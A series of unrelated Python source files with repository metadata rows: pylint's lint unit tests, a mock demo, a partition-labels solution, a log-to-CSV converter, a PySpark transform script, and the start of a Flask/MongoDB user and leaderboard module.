from pylint import config, lint
from pylint.lint import PyLinter, Run, preprocess_options, \
ArgumentPreprocessingError
from pylint.utils import MSG_STATE_SCOPE_CONFIG, MSG_STATE_SCOPE_MODULE, MSG_STATE_CONFIDENCE, \
MessagesStore, PyLintASTWalker, MessageDefinition, FileState, \
build_message_def, tokenize_module, UnknownMessage
from pylint.testutils import TestReporter, catch_warnings
from pylint.reporters import text, html
from pylint import checkers
from pylint.checkers.utils import check_messages
from pylint import interfaces
# Name of the environment variable holding the user's home directory:
# %USERPROFILE% on Windows (including Jython on NT), $HOME elsewhere.
if os.name == 'java':
    if os._name == 'nt':
        HOME = 'USERPROFILE'
    else:
        HOME = 'HOME'
else:
    if sys.platform == 'win32':
        HOME = 'USERPROFILE'
    else:
        HOME = 'HOME'
@contextmanager
def fake_home():
    """Temporarily point the home-directory env var at a fresh temp folder.

    On exit: any PYLINTRC override is dropped, the original home value is
    restored, and the temp folder is removed.
    """
    folder = tempfile.mkdtemp('fake-home')
    old_home = os.environ.get(HOME)
    try:
        os.environ[HOME] = folder
        yield
    finally:
        os.environ.pop('PYLINTRC', '')
        if old_home is None:
            del os.environ[HOME]
        else:
            os.environ[HOME] = old_home
        rmtree(folder, ignore_errors=True)
def remove(file):
    """Delete *file*, silently ignoring a missing path or other OSError."""
    try:
        os.remove(file)
    except OSError:
        pass
# Location of this test file and its 'input' fixture directory.
HERE = abspath(dirname(__file__))
INPUTDIR = join(HERE, 'input')
@contextmanager
def tempdir():
    """Create a temp directory, chdir into it, and clean up afterwards.

    Yields the absolute path of the directory; on exit the previous working
    directory is restored and the temp directory removed.
    """
    previous_cwd = getcwd()
    location = tempfile.mkdtemp()
    chdir(location)
    # Resolve the real path (e.g. /tmp is a symlink on mac os x) so the
    # yielded path matches what getcwd() reports inside the directory.
    resolved = abspath('.')
    try:
        yield resolved
    finally:
        chdir(previous_cwd)
        rmtree(resolved)
def create_files(paths, chroot='.'):
    """Creates directories and files found in <path>.

    :param paths: list of relative paths to files or directories
    :param chroot: the root directory in which paths will be created

    >>> from os.path import isdir, isfile
    >>> isdir('/tmp/a')
    False
    >>> create_files(['a/b/foo.py', 'a/b/c/', 'a/b/c/d/e.py'], '/tmp')
    >>> isdir('/tmp/a')
    True
    >>> isdir('/tmp/a/b/c')
    True
    >>> isfile('/tmp/a/b/c/d/e.py')
    True
    >>> isfile('/tmp/a/b/foo.py')
    True
    """
    dirs, files = set(), set()
    for path in paths:
        path = join(chroot, path)
        # A trailing separator (empty basename) marks a directory path.
        if basename(path) == '':
            dirs.add(path)
        else:
            dirs.add(dirname(path))
            files.add(path)
    for dirpath in dirs:
        # exist_ok replaces the racy isdir()-then-makedirs() check and makes
        # overlapping paths harmless.
        os.makedirs(dirpath, exist_ok=True)
    for filepath in files:
        open(filepath, 'w').close()
class SysPathFixupTC(unittest.TestCase):
    """Tests for ``lint.fix_import_path``: it should prepend the right
    package roots to ``sys.path`` inside the context and restore the
    original path afterwards."""
    def setUp(self):
        # Replace sys.path with a recognizable sentinel list.
        self.orig = list(sys.path)
        self.fake = [1, 2, 3]
        sys.path[:] = self.fake
    def tearDown(self):
        sys.path[:] = self.orig
    def test_no_args(self):
        """No arguments: sys.path must stay untouched."""
        with lint.fix_import_path([]):
            self.assertEqual(sys.path, self.fake)
        self.assertEqual(sys.path, self.fake)
    def test_one_arg(self):
        """All spellings of a single package resolve to its parent dir."""
        with tempdir() as chroot:
            create_files(['a/b/__init__.py'])
            expected = [join(chroot, 'a')] + self.fake
            cases = (
                ['a/b/'],
                ['a/b'],
                ['a/b/__init__.py'],
                ['a/'],
                ['a'],
            )
            self.assertEqual(sys.path, self.fake)
            for case in cases:
                with lint.fix_import_path(case):
                    self.assertEqual(sys.path, expected)
                self.assertEqual(sys.path, self.fake)
    def test_two_similar_args(self):
        """Two subpackages sharing a parent contribute that parent once."""
        with tempdir() as chroot:
            create_files(['a/b/__init__.py', 'a/c/__init__.py'])
            expected = [join(chroot, 'a')] + self.fake
            cases = (
                ['a/b', 'a/c'],
                ['a/c/', 'a/b/'],
                ['a/b/__init__.py', 'a/c/__init__.py'],
                ['a', 'a/c/__init__.py'],
            )
            self.assertEqual(sys.path, self.fake)
            for case in cases:
                with lint.fix_import_path(case):
                    self.assertEqual(sys.path, expected)
                self.assertEqual(sys.path, self.fake)
    def test_more_args(self):
        """Mixed packages and plain modules: duplicates are collapsed and
        order of first appearance is kept."""
        with tempdir() as chroot:
            create_files(['a/b/c/__init__.py', 'a/d/__init__.py', 'a/e/f.py'])
            expected = [
                join(chroot, suffix)
                for suffix in [sep.join(('a', 'b')), 'a', sep.join(('a', 'e'))]
            ] + self.fake
            cases = (
                ['a/b/c/__init__.py', 'a/d/__init__.py', 'a/e/f.py'],
                ['a/b/c', 'a', 'a/e'],
                ['a/b/c', 'a', 'a/b/c', 'a/e', 'a'],
            )
            self.assertEqual(sys.path, self.fake)
            for case in cases:
                with lint.fix_import_path(case):
                    self.assertEqual(sys.path, expected)
                self.assertEqual(sys.path, self.fake)
class PyLinterTC(unittest.TestCase):
    """Exercise the PyLinter front-end: message enabling/disabling at
    several scopes, reporters, option handling and checker selection."""
    def setUp(self):
        """Build a linter with all checkers registered and a test reporter."""
        self.linter = PyLinter()
        self.linter.disable('I')
        self.linter.config.persistent = 0
        # register checkers
        checkers.initialize(self.linter)
        self.linter.set_reporter(TestReporter())
    def init_linter(self):
        """Open the linter on a dummy module 'toto' and return it."""
        linter = self.linter
        linter.open()
        linter.set_current_module('toto')
        linter.file_state = FileState('toto')
        return linter
    def test_pylint_visit_method_taken_in_account(self):
        """A checker visit_* method guarded by check_messages is invoked."""
        class CustomChecker(checkers.BaseChecker):
            __implements__ = interfaces.IAstroidChecker
            name = 'custom'
            msgs = {'W9999': ('', 'custom', '')}
            @check_messages('custom')
            def visit_class(self, _):
                pass
        self.linter.register_checker(CustomChecker(self.linter))
        self.linter.open()
        out = six.moves.StringIO()
        self.linter.set_reporter(text.TextReporter(out))
        self.linter.check('abc')
    def test_enable_message(self):
        """Messages can be disabled per package or per module line and
        re-enabled again; module-scoped state resets on module change."""
        linter = self.init_linter()
        self.assertTrue(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('W0102'))
        linter.disable('W0101', scope='package')
        linter.disable('W0102', scope='module', line=1)
        self.assertFalse(linter.is_message_enabled('W0101'))
        self.assertFalse(linter.is_message_enabled('W0102', 1))
        linter.set_current_module('tutu')
        self.assertFalse(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('W0102'))
        linter.enable('W0101', scope='package')
        linter.enable('W0102', scope='module', line=1)
        self.assertTrue(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('W0102', 1))
    def test_enable_message_category(self):
        """Whole message categories (single letters) can be toggled at once."""
        linter = self.init_linter()
        self.assertTrue(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('C0202'))
        linter.disable('W', scope='package')
        linter.disable('C', scope='module', line=1)
        self.assertFalse(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('C0202'))
        self.assertFalse(linter.is_message_enabled('C0202', line=1))
        linter.set_current_module('tutu')
        self.assertFalse(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('C0202'))
        linter.enable('W', scope='package')
        linter.enable('C', scope='module', line=1)
        self.assertTrue(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('C0202'))
        self.assertTrue(linter.is_message_enabled('C0202', line=1))
    def test_message_state_scope(self):
        """get_message_state_scope reports config, module or confidence scope."""
        class FakeConfig(object):
            confidence = ['HIGH']
        linter = self.init_linter()
        linter.disable('C0202')
        self.assertEqual(MSG_STATE_SCOPE_CONFIG,
                         linter.get_message_state_scope('C0202'))
        linter.disable('W0101', scope='module', line=3)
        self.assertEqual(MSG_STATE_SCOPE_CONFIG,
                         linter.get_message_state_scope('C0202'))
        self.assertEqual(MSG_STATE_SCOPE_MODULE,
                         linter.get_message_state_scope('W0101', 3))
        linter.enable('W0102', scope='module', line=3)
        self.assertEqual(MSG_STATE_SCOPE_MODULE,
                         linter.get_message_state_scope('W0102', 3))
        linter.config = FakeConfig()
        self.assertEqual(
            MSG_STATE_CONFIDENCE,
            linter.get_message_state_scope('this-is-bad',
                                           confidence=interfaces.INFERENCE))
    def test_enable_message_block(self):
        """Block-level disable comments in a source file are honoured per
        line; line numbers below refer to func_block_disable_msg.py."""
        linter = self.init_linter()
        linter.open()
        filepath = join(INPUTDIR, 'func_block_disable_msg.py')
        linter.set_current_module('func_block_disable_msg')
        astroid = linter.get_ast(filepath, 'func_block_disable_msg')
        linter.process_tokens(tokenize_module(astroid))
        fs = linter.file_state
        fs.collect_block_lines(linter.msgs_store, astroid)
        # global (module level)
        self.assertTrue(linter.is_message_enabled('W0613'))
        self.assertTrue(linter.is_message_enabled('E1101'))
        # meth1
        self.assertTrue(linter.is_message_enabled('W0613', 13))
        # meth2
        self.assertFalse(linter.is_message_enabled('W0613', 18))
        # meth3
        self.assertFalse(linter.is_message_enabled('E1101', 24))
        self.assertTrue(linter.is_message_enabled('E1101', 26))
        # meth4
        self.assertFalse(linter.is_message_enabled('E1101', 32))
        self.assertTrue(linter.is_message_enabled('E1101', 36))
        # meth5
        self.assertFalse(linter.is_message_enabled('E1101', 42))
        self.assertFalse(linter.is_message_enabled('E1101', 43))
        self.assertTrue(linter.is_message_enabled('E1101', 46))
        self.assertFalse(linter.is_message_enabled('E1101', 49))
        self.assertFalse(linter.is_message_enabled('E1101', 51))
        # meth6
        self.assertFalse(linter.is_message_enabled('E1101', 57))
        self.assertTrue(linter.is_message_enabled('E1101', 61))
        self.assertFalse(linter.is_message_enabled('E1101', 64))
        self.assertFalse(linter.is_message_enabled('E1101', 66))
        self.assertTrue(linter.is_message_enabled('E0602', 57))
        self.assertTrue(linter.is_message_enabled('E0602', 61))
        self.assertFalse(linter.is_message_enabled('E0602', 62))
        self.assertTrue(linter.is_message_enabled('E0602', 64))
        self.assertTrue(linter.is_message_enabled('E0602', 66))
        # meth7
        self.assertFalse(linter.is_message_enabled('E1101', 70))
        self.assertTrue(linter.is_message_enabled('E1101', 72))
        self.assertTrue(linter.is_message_enabled('E1101', 75))
        self.assertTrue(linter.is_message_enabled('E1101', 77))
        fs = linter.file_state
        self.assertEqual(17, fs._suppression_mapping['W0613', 18])
        self.assertEqual(30, fs._suppression_mapping['E1101', 33])
        self.assertTrue(('E1101', 46) not in fs._suppression_mapping)
        self.assertEqual(1, fs._suppression_mapping['C0302', 18])
        self.assertEqual(1, fs._suppression_mapping['C0302', 50])
        # This is tricky. While the disable in line 106 is disabling
        # both 108 and 110, this is usually not what the user wanted.
        # Therefore, we report the closest previous disable comment.
        self.assertEqual(106, fs._suppression_mapping['E1101', 108])
        self.assertEqual(109, fs._suppression_mapping['E1101', 110])
    def test_enable_by_symbol(self):
        """messages can be controlled by symbolic names.
        The state is consistent across symbols and numbers.
        """
        linter = self.init_linter()
        self.assertTrue(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('unreachable'))
        self.assertTrue(linter.is_message_enabled('W0102'))
        self.assertTrue(linter.is_message_enabled('dangerous-default-value'))
        linter.disable('unreachable', scope='package')
        linter.disable('dangerous-default-value', scope='module', line=1)
        self.assertFalse(linter.is_message_enabled('W0101'))
        self.assertFalse(linter.is_message_enabled('unreachable'))
        self.assertFalse(linter.is_message_enabled('W0102', 1))
        self.assertFalse(linter.is_message_enabled('dangerous-default-value', 1))
        linter.set_current_module('tutu')
        self.assertFalse(linter.is_message_enabled('W0101'))
        self.assertFalse(linter.is_message_enabled('unreachable'))
        self.assertTrue(linter.is_message_enabled('W0102'))
        self.assertTrue(linter.is_message_enabled('dangerous-default-value'))
        linter.enable('unreachable', scope='package')
        linter.enable('dangerous-default-value', scope='module', line=1)
        self.assertTrue(linter.is_message_enabled('W0101'))
        self.assertTrue(linter.is_message_enabled('unreachable'))
        self.assertTrue(linter.is_message_enabled('W0102', 1))
        self.assertTrue(linter.is_message_enabled('dangerous-default-value', 1))
    def test_lint_ext_module_with_file_output(self):
        """files_output=True writes per-module and global report files."""
        self.linter.set_reporter(text.TextReporter())
        if sys.version_info < (3, 0):
            strio = 'StringIO'
        else:
            strio = 'io'
        self.linter.config.files_output = True
        pylint_strio = 'pylint_%s.txt' % strio
        files = [pylint_strio, 'pylint_global.txt']
        for file in files:
            self.addCleanup(remove, file)
        self.linter.check(strio)
        self.linter.generate_reports()
        for f in files:
            self.assertTrue(os.path.exists(f))
    def test_enable_report(self):
        """Reports (RP* identifiers) can be disabled and re-enabled."""
        self.assertEqual(self.linter.report_is_enabled('RP0001'), True)
        self.linter.disable('RP0001')
        self.assertEqual(self.linter.report_is_enabled('RP0001'), False)
        self.linter.enable('RP0001')
        self.assertEqual(self.linter.report_is_enabled('RP0001'), True)
    def test_report_output_format_aliased(self):
        """The 'text' output-format alias resolves to TextReporter."""
        text.register(self.linter)
        self.linter.set_option('output-format', 'text')
        self.assertEqual(self.linter.reporter.__class__.__name__, 'TextReporter')
    def test_report_output_format_custom(self):
        """A dotted class path as output-format loads a custom reporter."""
        this_module = sys.modules[__name__]
        class TestReporter(object):
            pass
        this_module.TestReporter = TestReporter
        class_name = ".".join((this_module.__name__, 'TestReporter'))
        self.linter.set_option('output-format', class_name)
        self.assertEqual(self.linter.reporter.__class__.__name__, 'TestReporter')
    def test_set_option_1(self):
        """set_option('disable', ...) accepts a comma-separated string and
        affects both numeric ids and symbolic names."""
        linter = self.linter
        linter.set_option('disable', 'C0111,W0234')
        self.assertFalse(linter.is_message_enabled('C0111'))
        self.assertFalse(linter.is_message_enabled('W0234'))
        self.assertTrue(linter.is_message_enabled('W0113'))
        self.assertFalse(linter.is_message_enabled('missing-docstring'))
        self.assertFalse(linter.is_message_enabled('non-iterator-returned'))
    def test_set_option_2(self):
        """set_option('disable', ...) also accepts a tuple of message ids."""
        linter = self.linter
        linter.set_option('disable', ('C0111', 'W0234') )
        self.assertFalse(linter.is_message_enabled('C0111'))
        self.assertFalse(linter.is_message_enabled('W0234'))
        self.assertTrue(linter.is_message_enabled('W0113'))
        self.assertFalse(linter.is_message_enabled('missing-docstring'))
        self.assertFalse(linter.is_message_enabled('non-iterator-returned'))
    def test_enable_checkers(self):
        """Disabling/enabling a checker removes/restores it from preparation."""
        self.linter.disable('design')
        self.assertFalse('design' in [c.name for c in self.linter.prepare_checkers()])
        self.linter.enable('design')
        self.assertTrue('design' in [c.name for c in self.linter.prepare_checkers()])
    def test_errors_only(self):
        """error_mode() drops the purely stylistic checkers."""
        linter = self.linter
        self.linter.error_mode()
        checkers = self.linter.prepare_checkers()
        checker_names = set(c.name for c in checkers)
        should_not = set(('design', 'format', 'metrics',
                          'miscellaneous', 'similarities'))
        self.assertSetEqual(set(), should_not & checker_names)
    def test_disable_similar(self):
        """Disabling the similarity report and message drops the checker."""
        self.linter.set_option('disable', 'RP0801')
        self.linter.set_option('disable', 'R0801')
        self.assertFalse('similarities' in [c.name for c in self.linter.prepare_checkers()])
    def test_disable_alot(self):
        """check that we disabled a lot of checkers"""
        self.linter.set_option('reports', False)
        self.linter.set_option('disable', 'R,C,W')
        checker_names = [c.name for c in self.linter.prepare_checkers()]
        for cname in ('design', 'metrics', 'similarities'):
            self.assertFalse(cname in checker_names, cname)
    def test_addmessage(self):
        """add_message accepts both numeric ids and symbolic names."""
        self.linter.set_reporter(TestReporter())
        self.linter.open()
        self.linter.set_current_module('0123')
        self.linter.add_message('C0301', line=1, args=(1, 2))
        self.linter.add_message('line-too-long', line=2, args=(3, 4))
        self.assertEqual(
            ['C: 1: Line too long (1/2)', 'C: 2: Line too long (3/4)'],
            self.linter.reporter.messages)
    def test_init_hooks_called_before_load_plugins(self):
        """--init-hook code runs before plugins load, whatever the CLI order."""
        self.assertRaises(RuntimeError,
                          Run, ['--load-plugins', 'unexistant', '--init-hook', 'raise RuntimeError'])
        self.assertRaises(RuntimeError,
                          Run, ['--init-hook', 'raise RuntimeError', '--load-plugins', 'unexistant'])
    def test_analyze_explicit_script(self):
        """An extensionless script given explicitly is still analysed."""
        self.linter.set_reporter(TestReporter())
        self.linter.check(os.path.join(os.path.dirname(__file__), 'data', 'ascript'))
        self.assertEqual(
            ['C: 2: Line too long (175/100)'],
            self.linter.reporter.messages)
    def test_html_reporter_missing_files(self):
        """The HTML reporter emits a fatal entry for a missing module."""
        output = six.StringIO()
        with catch_warnings():
            self.linter.set_reporter(html.HTMLReporter(output))
        self.linter.set_option('output-format', 'html')
        self.linter.check('troppoptop.py')
        self.linter.generate_reports()
        value = output.getvalue()
        self.assertIn('troppoptop.py', value)
        self.assertIn('fatal', value)
    def test_python3_checker_disabled(self):
        """The python3 porting checker is off by default, on when enabled."""
        checker_names = [c.name for c in self.linter.prepare_checkers()]
        self.assertNotIn('python3', checker_names)
        self.linter.set_option('enable', 'python3')
        checker_names = [c.name for c in self.linter.prepare_checkers()]
        self.assertIn('python3', checker_names)
class ConfigTC(unittest.TestCase):
    """Check discovery of the pylintrc file and the PYLINT_HOME directory."""
    def setUp(self):
        """Make sure an ambient PYLINTRC value does not leak into the tests."""
        os.environ.pop('PYLINTRC', None)
    def test_pylint_home(self):
        """PYLINT_HOME defaults to ~/.pylint.d and honours $PYLINTHOME."""
        uhome = os.path.expanduser('~')
        if uhome == '~':
            expected = '.pylint.d'
        else:
            expected = os.path.join(uhome, '.pylint.d')
        self.assertEqual(config.PYLINT_HOME, expected)
        try:
            pylintd = join(tempfile.gettempdir(), '.pylint.d')
            os.environ['PYLINTHOME'] = pylintd
            try:
                # config reads the environment at import time, so reload it.
                reload_module(config)
                self.assertEqual(config.PYLINT_HOME, pylintd)
            finally:
                try:
                    os.remove(pylintd)
                except:
                    pass
        finally:
            del os.environ['PYLINTHOME']
    def test_pylintrc(self):
        """find_pylintrc ignores PYLINTRC values not pointing to a file."""
        with fake_home():
            try:
                self.assertEqual(config.find_pylintrc(), None)
                os.environ['PYLINTRC'] = join(tempfile.gettempdir(),
                                              '.pylintrc')
                self.assertEqual(config.find_pylintrc(), None)
                os.environ['PYLINTRC'] = '.'
                self.assertEqual(config.find_pylintrc(), None)
            finally:
                reload_module(config)
    def test_pylintrc_parentdir(self):
        """Lookup walks up through package parents to find a pylintrc."""
        with tempdir() as chroot:
            create_files(['a/pylintrc', 'a/b/__init__.py', 'a/b/pylintrc',
                          'a/b/c/__init__.py', 'a/b/c/d/__init__.py',
                          'a/b/c/d/e/.pylintrc'])
            with fake_home():
                self.assertEqual(config.find_pylintrc(), None)
            results = {'a' : join(chroot, 'a', 'pylintrc'),
                       'a/b' : join(chroot, 'a', 'b', 'pylintrc'),
                       'a/b/c' : join(chroot, 'a', 'b', 'pylintrc'),
                       'a/b/c/d' : join(chroot, 'a', 'b', 'pylintrc'),
                       'a/b/c/d/e' : join(chroot, 'a', 'b', 'c', 'd', 'e', '.pylintrc'),
                       }
            for basedir, expected in results.items():
                os.chdir(join(chroot, basedir))
                self.assertEqual(config.find_pylintrc(), expected)
    def test_pylintrc_parentdir_no_package(self):
        """Lookup stops at directories that are not Python packages."""
        with tempdir() as chroot:
            with fake_home():
                create_files(['a/pylintrc', 'a/b/pylintrc', 'a/b/c/d/__init__.py'])
                self.assertEqual(config.find_pylintrc(), None)
                results = {'a' : join(chroot, 'a', 'pylintrc'),
                           'a/b' : join(chroot, 'a', 'b', 'pylintrc'),
                           'a/b/c' : None,
                           'a/b/c/d' : None,
                           }
                for basedir, expected in results.items():
                    os.chdir(join(chroot, basedir))
                    self.assertEqual(config.find_pylintrc(), expected)
class PreprocessOptionsTC(unittest.TestCase):
    """Check preprocess_options callback dispatch and error handling."""
    def _callback(self, name, value):
        """Record each (name, value) pair preprocess_options hands back."""
        self.args.append((name, value))
    def test_value_equal(self):
        """Option values may be attached with the '--opt=value' form."""
        self.args = []
        preprocess_options(['--foo', '--bar=baz', '--qu=ux'],
                           {'foo' : (self._callback, False),
                            'qu' : (self._callback, True)})
        self.assertEqual(
            [('foo', None), ('qu', 'ux')], self.args)
    def test_value_space(self):
        """Option values may also follow as a separate argument."""
        self.args = []
        preprocess_options(['--qu', 'ux'],
                           {'qu' : (self._callback, True)})
        self.assertEqual(
            [('qu', 'ux')], self.args)
    def test_error_missing_expected_value(self):
        """A value-taking option without a value raises
        ArgumentPreprocessingError, whether followed by another option
        or at the end of the argument list."""
        self.assertRaises(
            ArgumentPreprocessingError,
            preprocess_options,
            ['--foo', '--bar', '--qu=ux'],
            {'bar' : (None, True)})
        self.assertRaises(
            ArgumentPreprocessingError,
            preprocess_options,
            ['--foo', '--bar'],
            {'bar' : (None, True)})
    def test_error_unexpected_value(self):
        """A value given to a flag-style option raises
        ArgumentPreprocessingError."""
        self.assertRaises(
            ArgumentPreprocessingError,
            preprocess_options,
            ['--foo', '--bar=spam', '--qu=ux'],
            {'bar' : (None, False)})
class MessagesStoreTC(unittest.TestCase):
    """Check MessagesStore registration, lookup, help rendering and the
    handling of renamed messages."""
    def setUp(self):
        """Register a fake checker with one renamed message and one message
        capped to Python < 2.6."""
        self.store = MessagesStore()
        class Checker(object):
            name = 'achecker'
            msgs = {
                'W1234': ('message', 'msg-symbol', 'msg description.',
                          {'old_names': [('W0001', 'old-symbol')]}),
                'E1234': ('Duplicate keyword argument %r in %s call',
                          'duplicate-keyword-arg',
                          'Used when a function call passes the same keyword argument multiple times.',
                          {'maxversion': (2, 6)}),
                }
        self.store.register_messages(Checker())
    def _compare_messages(self, desc, msg, checkerref=False):
        """Assert that the message's formatted help equals *desc*."""
        self.assertMultiLineEqual(desc, msg.format_help(checkerref=checkerref))
    def test_check_message_id(self):
        """check_message_id returns a MessageDefinition for known ids and
        raises UnknownMessage otherwise."""
        self.assertIsInstance(self.store.check_message_id('W1234'),
                              MessageDefinition)
        self.assertRaises(UnknownMessage,
                          self.store.check_message_id, 'YB12')
    def test_message_help(self):
        """format_help renders symbol, id and (optionally) the checker name."""
        msg = self.store.check_message_id('W1234')
        self._compare_messages(
            ''':msg-symbol (W1234): *message*
msg description. This message belongs to the achecker checker.''',
            msg, checkerref=True)
        self._compare_messages(
            ''':msg-symbol (W1234): *message*
msg description.''',
            msg, checkerref=False)
    def test_message_help_minmax(self):
        # build the message manually to be python version independant
        msg = self.store.check_message_id('E1234')
        self._compare_messages(
            ''':duplicate-keyword-arg (E1234): *Duplicate keyword argument %r in %s call*
Used when a function call passes the same keyword argument multiple times.
This message belongs to the achecker checker. It can't be emitted when using
Python >= 2.6.''',
            msg, checkerref=True)
        self._compare_messages(
            ''':duplicate-keyword-arg (E1234): *Duplicate keyword argument %r in %s call*
Used when a function call passes the same keyword argument multiple times.
This message can't be emitted when using Python >= 2.6.''',
            msg, checkerref=False)
    def test_list_messages(self):
        """list_messages prints every registered message to stdout."""
        sys.stdout = six.StringIO()
        try:
            self.store.list_messages()
            output = sys.stdout.getvalue()
        finally:
            sys.stdout = sys.__stdout__
        # cursory examination of the output: we're mostly testing it completes
        self.assertIn(':msg-symbol (W1234): *message*', output)
    def test_add_renamed_message(self):
        """add_renamed_message makes the old symbol resolve to the new one."""
        self.store.add_renamed_message('W1234', 'old-bad-name', 'msg-symbol')
        self.assertEqual('msg-symbol',
                         self.store.check_message_id('W1234').symbol)
        self.assertEqual('msg-symbol',
                         self.store.check_message_id('old-bad-name').symbol)
    def test_renamed_message_register(self):
        """old_names declared at registration time are usable immediately."""
        self.assertEqual('msg-symbol',
                         self.store.check_message_id('W0001').symbol)
        self.assertEqual('msg-symbol',
                         self.store.check_message_id('old-symbol').symbol)
# Run the whole test module when executed directly.
if __name__ == '__main__':
    unittest.main()
| a0x8o/kafka | sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/test/unittest_lint.py | unittest_lint.py | py | 26,703 | python | en | code | 59 | github-code | 36 |
73119063784 | import unittest.mock as mock
def fun(service):
    """Drive the given service collaborator and return its get() result.

    Calls show(), sets the collaborator's name to "Hello", then returns
    whatever get() yields.
    """
    service.show()          # trigger the side-effect call
    service.name = "Hello"  # mutate the collaborator
    result = service.get()
    return result
# Demo: a Mock records calls made on it and returns the stubbed value.
m = mock.Mock()
m.get.return_value = 100
res = fun(m)
assert(m.show.called is True)
assert(res == 100)
| IlyaOrlov/PythonCourse2.0_September23 | Useful/for_lec_22/mock_simple_example.py | mock_simple_example.py | py | 236 | python | en | code | 2 | github-code | 36 |
24272755981 | # A string S of lowercase English letters is given. We want to partition this string into
# as many parts as possible so that each letter appears in at most one part, and return
# a list of integers representing the size of these parts.
def partition_labels(S):
    """Split S into as many parts as possible so each letter appears in at
    most one part; return the sizes of the parts in order.

    A part can only end at index i when i is at least as far as the last
    occurrence of every letter seen so far in the part.
    """
    last_seen = {ch: idx for idx, ch in enumerate(S)}
    sizes = []
    boundary = -1
    start = 0
    for idx, ch in enumerate(S):
        if last_seen[ch] > boundary:
            boundary = last_seen[ch]
        if idx == boundary:
            sizes.append(idx - start + 1)
            start = idx + 1
    return sizes
print(partition_labels("ababcbacadefegdehijhklij")) | elainedo/python_practice | Array/PartitionLabels.py | PartitionLabels.py | py | 646 | python | en | code | 0 | github-code | 36 |
1274170578 | import csv
def line_message(line):
    """Return the free-text message portion after the last ']' of the line."""
    prefix_and_message = line.rsplit(']', 1)
    return prefix_and_message[1]
def line_thread(line):
    """Return the fifth bracket-delimited field of the line header, or ''
    when the header has fewer than five fields."""
    header = line.rsplit(']', 1)[0]
    fields = header.replace("]", "").split("[")
    return fields[4] if len(fields) >= 5 else ""
def read_columns(lines):
    """Collect the set of distinct thread names appearing in the log lines."""
    return {line_thread(line) for line in lines}
def get_column(columns, column):
    """Return the position of *column* in the iteration order of *columns*."""
    ordered = list(columns)
    return ordered.index(column)
def create_row(column, nbr_columns, message):
    """Build a CSV row of *nbr_columns* cells, empty except for *message*
    placed at index *column* (all cells empty if the index is out of range)."""
    return [message if cell == column else '' for cell in range(nbr_columns)]
# Convert the spdlog-style text log into a CSV where each thread gets its
# own column and every log line becomes one row with its message placed in
# that thread's column.
with open('logs/basic-log.txt') as f, open('logs/basic-log.csv', 'w', newline='') as csvfile:
    csvwriter = csv.writer(csvfile)
    lines = f.readlines()
    # One CSV column per distinct thread name found in the file.
    columns = read_columns(lines)
    nbr_columns = len(columns)
    for line in lines:
        csvwriter.writerow(create_row(get_column(columns, line_thread(line)), nbr_columns, line_message(line)))
| ChristofferGreen/Forsoning | src/tools/spdtocsv.py | spdtocsv.py | py | 995 | python | en | code | 0 | github-code | 36 |
29500719773 | import json
from pyspark.sql import SparkSession
from pyspark.sql.functions import concat, col, lit, split, to_date, date_format
import os
import time
# Create (or reuse) the shared SparkSession.
spark = SparkSession.builder.getOrCreate()
# Start the timer so we can report total processing time at the end.
start_time = time.time()
# Load the transformation pipeline description from config.json.
with open('config.json') as f:
    config = json.load(f)
# Check that the configured input file exists and is in CSV format.
if 'input_csv' not in config or not config['input_csv'].endswith('.csv') or not os.path.exists(config['input_csv']):
    print("No CSV file is selected or the file is invalid.")
    exit()
# Load the DataFrame from the CSV file (schema inferred from the data).
df = spark.read.csv(config['input_csv'], header=True, inferSchema=True)
# Stage the DataFrame as a Parquet file so later reads are columnar.
df.write.mode("overwrite").parquet('temp.parquet')
# Reload the DataFrame from the staged Parquet file.
df = spark.read.parquet('temp.parquet')
# Apply each configured transformation in order.
for transformation in config['transformations']:
    if transformation['type'] == 'date_format':
        # Parse with the input format, then re-render with the output format.
        df = df.withColumn(transformation['column'], to_date(col(transformation['column']), transformation['input_format']))
        df = df.withColumn(transformation['column'], date_format(col(transformation['column']), transformation['output_format']))
    elif transformation['type'] == 'concat':
        # NOTE(review): the separator is appended once after all columns,
        # not placed between them — confirm this is the intended behaviour
        # (concat_ws would interleave it instead).
        df = df.withColumn(transformation['output_column'], concat(*[col(c) for c in transformation['columns']], lit(transformation['separator'])))
    elif transformation['type'] == 'split':
        split_col = split(df[transformation['column']], transformation['separator'])
        for i, output_column in enumerate(transformation['output_columns']):
            df = df.withColumn(output_column, split_col.getItem(i))
    elif transformation['type'] == 'drop':
        df = df.drop(transformation['column'])
# Get the total number of records (forces evaluation of the pipeline).
total_records = df.count()
# Print the total number of records.
print("Total records: ", total_records)
# Save the transformed DataFrame to the configured output Parquet file.
df.write.mode('overwrite').parquet(config['output_parquet'])
df = spark.read.parquet(config['output_parquet'])
df.show()
# End the timer.
end_time = time.time()
# Calculate the elapsed time.
elapsed_time = end_time - start_time
# Print the elapsed time.
print("Time taken: {} seconds".format(elapsed_time))
| hari01008/Extract-Transform-Load-With-Mysql-and-Pyspark | transform.py | transform.py | py | 2,316 | python | en | code | 0 | github-code | 36 |
43163584792 | from flask import Flask
from flask_pymongo import PyMongo
from operator import itemgetter
from flask_login import LoginManager
import sys
# Initialize the Flask app and its MongoDB connection.
app = Flask(__name__)
# mongodb_client = PyMongo(app, uri='mongodb://localhost:27017/todo_db')
mongodb_client = PyMongo(app, uri='mongodb://mongo:27017/todo_db')
db = mongodb_client.db
# Collections used throughout this module.
user_collection = db['users']       # per-user credentials and W/L/D stats
leaderboard = db['leaderboard']     # one {username: score} document per user
rooms_collection = db['rooms']      # username -> current game room
lobby_collection = db['lobbies']    # open lobbies awaiting a second player
# Create a new user record and a matching zeroed leaderboard entry.
def add_user(username, password):
    """Insert *username* with the given password and zeroed stats, and seed
    the leaderboard with a score of 0 for them."""
    record = {'username': username, 'password': password, 'wins': 0, 'loss': 0, 'draw': 0}
    user_collection.insert_one(record)
    leaderboard.insert_one({username: 0})
def check_for_user(username):
    """Return the user document for *username*, or None if no such user.

    find_one already returns None when there is no match, so the previous
    explicit ``if result is not None ... else return None`` branching was
    redundant and is folded into a single return.
    """
